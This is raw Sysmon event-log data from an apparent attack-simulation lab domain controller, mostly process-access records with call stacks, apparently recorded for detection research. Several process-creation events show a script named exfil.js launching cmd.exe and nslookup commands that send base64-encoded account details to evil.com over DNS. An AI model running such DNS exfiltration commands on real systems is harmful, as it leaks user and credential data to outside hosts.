14:21:37.444{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7B44-000000005F02}7552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.429{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.429{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.429{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7A44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.429{2E1864BB-18E0-629A-6742-000000005F02}39767432C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-7A44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.443{2E1864BB-18F1-629A-7A44-000000005F02}4580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.429{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlknns.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-18F1-629A-7844-000000005F02}69601044C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7944-000000005F02}2380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7944-000000005F02}2380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.397{2E1864BB-18F1-629A-7744-000000005F02}77524204C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7944-000000005F02}2380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.398{2E1864BB-18F1-629A-7944-000000005F02}2380C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-7744-000000005F02}7752C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlknns.tmp 2>&1 10341000x8000000000000000211017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.376{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7844-000000005F02}6960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.376{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7844-000000005F02}6960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.360{2E1864BB-18F1-629A-7844-000000005F02}69601044C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7744-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7844-000000005F02}6960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7744-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-18E0-629A-6742-000000005F02}39767512C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-7744-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.349{2E1864BB-18F1-629A-7744-000000005F02}7752C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlknns.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.344{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyomwu.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.297{2E1864BB-18F1-629A-7544-000000005F02}57048016C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7644-000000005F02}6504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 